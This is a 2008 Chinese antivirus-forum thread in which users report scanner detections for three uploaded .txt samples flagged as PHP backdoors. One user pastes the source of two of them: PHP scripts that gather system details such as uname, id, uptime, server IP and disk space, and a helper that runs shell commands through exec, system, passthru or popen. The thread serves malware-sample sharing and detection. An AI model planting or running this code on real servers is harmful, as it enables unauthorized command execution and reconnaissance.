查看: 3545|回复: 20
收起左侧

[病毒样本] 3个txt

[复制链接]
woai_jolin
发表于 2008-8-10 08:29:26 | 显示全部楼层 |阅读模式
Older
发表于 2008-8-10 08:35:34 | 显示全部楼层
Sign of "PHP:Small-A [Trj]" has been found in "E:\download\txt.rar\2.txt" file.
aribeth199
发表于 2008-8-10 08:49:09 | 显示全部楼层
2008-8-10 8:46:53        http://bbs.kafan.cn/attachment.p ... t=1218329321//2.txt        Detected: Backdoor.PHP.Small.t
nosferatu
头像被屏蔽
发表于 2008-8-10 08:50:57 | 显示全部楼层
http://bbs.kafan.cn/attachment.p ... t=1218329372//2.txt        Opera Internet Browser        拒绝: Backdoor.PHP.Small.t
Tynox
发表于 2008-8-10 08:58:29 | 显示全部楼层
卡巴8阻止下载.
hj5abc
发表于 2008-8-10 09:23:30 | 显示全部楼层
antivir.

The file 'H:\txt\3.txt'
contained a virus or unwanted program 'BDS/PHP.ali.4' [backdoor]
Action(s) taken:The file was deleted!


The file 'H:\txt\2.txt'
contained a virus or unwanted program 'BDS/PHP.Small.T' [backdoor]
Action(s) taken:The file was deleted!


tian832
发表于 2008-8-10 09:28:19 | 显示全部楼层
上报费尔
Palkia
发表于 2008-8-10 09:39:35 | 显示全部楼层
1.txt               0.76/0.76KB         100.00%    在线扫描      没有发现病毒,但这并不能说明此文件百分之百可信。2008-8-10 9:38:32    2008-8-10 9:38:35   
2.txt               0.76/0.76KB         100.00%    在线扫描      它是一个“后门程序”2008-8-10 9:38:37    2008-8-10 9:38:40   
3.txt               0.97/0.97KB         100.00%    在线扫描      它是一个“后门程序”2008-8-10 9:38:40    2008-8-10 9:38:43
qigang
发表于 2008-8-10 10:12:14 | 显示全部楼层

1

<?php
function ConvertBytes($number)
{
        $len = strlen($number);
        if($len < 4)
        {
                return sprintf("%d b", $number);
        }
        if($len >= 4 && $len <=6)
        {
                return sprintf("%0.2f Kb", $number/1024);
        }
        if($len >= 7 && $len <=9)
        {
                return sprintf("%0.2f Mb", $number/1024/1024);
        }
   
        return sprintf("%0.2f Gb", $number/1024/1024/1024);
                           
}

echo "Osirys<br>";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;


echo "Naiz was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
qigang
发表于 2008-8-10 10:12:36 | 显示全部楼层

2

<?
$dir = @getcwd();
echo "Mic22<br>";
$OS = @PHP_OS;
echo "OSTYPE:$OS<br>";
$free = disk_free_space($dir);

if ($free === FALSE) {$free = 0;}

if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";

$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;

function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}

function view_size($size)

{

if (!is_numeric($size)) {return FALSE;}

else

{

if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}

elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}

elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}

else {$size = $size . " B";}

return $size;

}}

exit;
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-7-14 14:04 , Processed in 0.110821 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表